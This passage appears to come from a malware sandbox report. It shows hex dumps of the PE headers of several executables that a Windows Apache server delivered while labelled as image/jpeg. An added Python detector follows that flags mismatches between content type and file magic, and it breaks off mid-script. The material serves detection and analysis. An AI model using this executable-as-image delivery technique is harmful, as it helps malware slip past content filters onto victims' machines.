20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Sun, 06 Aug 2017 19:52:20 GMTETag: "9d9d8-5561b116cc500"Accept-Ranges: bytesContent-Length: 645592Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 
74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:00:58 GMTETag: "519d0-58a9fc2e87280"Accept-Ranges: bytesContent-Length: 334288Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 
74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:20 GMTETag: "217d0-58a9fc4382400"Accept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 
00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:29 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:30 GMTETag: "6b738-58a9fc4d0ba80"Accept-Ranges: bytesContent-Length: 440120Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 
61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:30 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:44 GMTETag: "1303d0-58a9fc5a65a00"Accept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 
00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:31 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:02:02 GMTETag: "14748-58a9fc6b90280"Accept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 
00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
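Every response above declares Content-Type: image/jpeg, yet each body opens with 4d 5a ("MZ") and, at the offset stored in e_lfanew (0x3C), carries 50 45 00 00 4c 01 (the PE signature followed by Machine 0x14c, i386); that is the "wrong headers with respect to MIME Content-Type" and "downloads executable code via HTTP" finding. The Python below is an added example, not part of the report or of the sample: it splits an HTTP response, compares the declared type against the body's magic, and walks MZ -> e_lfanew -> PE signature with bounds checks so a truncated body or a stray "MZ" prefix cannot make the detector raise. The response bytes are constructed: the headers are copied from the report, the body is a hand-built minimal PE prefix rather than the real download.

```python
"""Declared Content-Type versus body magic, with a bounds-checked PE walk.

Added example; not Joe Sandbox code and not code from the sample. The
response below is constructed: report headers, hand-built PE prefix.
"""
import struct

# Magic bytes for the image types the sample's server claimed to return.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}


def pe_info(body: bytes):
    """Return (machine, number_of_sections) if body is a PE image, else None.

    Every offset is bounds-checked: a body shorter than the DOS header, an
    e_lfanew pointing past the end, or a missing 'PE\\0\\0' yields None
    instead of an exception."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 8 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", body, e_lfanew + 4)
    return machine, nsections


def split_response(raw: bytes):
    """Split a raw HTTP response into (lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def content_type_mismatch(raw: bytes):
    """Describe the mismatch between declared type and body, or None."""
    headers, body = split_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    pe = pe_info(body)
    if pe is not None and not declared.startswith("application/"):
        machine, nsections = pe
        return (f"declared {declared}, body is PE "
                f"(machine=0x{machine:x}, {nsections} sections)")
    expected = MAGIC.get(declared)
    if expected and not body.startswith(expected):
        return f"declared {declared}, body lacks {declared} magic"
    return None


def build_fake_pe(e_lfanew=0x80, machine=0x14C, nsections=5) -> bytes:
    """Hand-built minimal PE prefix (constructed test data, not the sample).
    Defaults mirror the report's header bytes: Machine 0x14c, 5 sections."""
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HH", machine, nsections) + b"\0" * 16
    return bytes(dos) + b"PE\0\0" + coff


# Headers as quoted in the report; bodies constructed.
RESPONSE_HEAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
)
FAKE_JPEG_RESPONSE = RESPONSE_HEAD + build_fake_pe()
REAL_JPEG_RESPONSE = RESPONSE_HEAD + b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
OCTET_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
                  + build_fake_pe())

if __name__ == "__main__":
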